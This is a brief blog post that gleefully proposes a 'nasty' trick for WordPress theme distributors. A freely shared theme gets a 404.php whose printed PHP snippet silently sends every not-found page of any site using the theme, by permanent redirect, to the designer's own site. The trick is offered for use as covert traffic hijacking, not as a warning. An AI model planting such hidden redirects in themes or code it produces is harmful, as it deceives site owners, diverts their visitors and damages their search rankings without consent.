Wordpress Nasty Designer Trick
I was feeling evil. I just thought of this wonderful way you can get a lot of traffic to your site if you are going to distribute WP themes. Even if it’s for free, this trick may pay off over a long time.
Either you can make your own theme or just get a designer for it. Make a simple wordpress theme that’s attractive with the usual style.css index.php comments.php comments popup.php single.php page.php category.php author.php date.php archive.php search.php.
In the 404.php just add this
<?
Header( “HTTP/1.1 301 Moved Permanently” );
Header( “Location: http://www.placeyoursitehere.com” );
?>
Muhahahahaha




















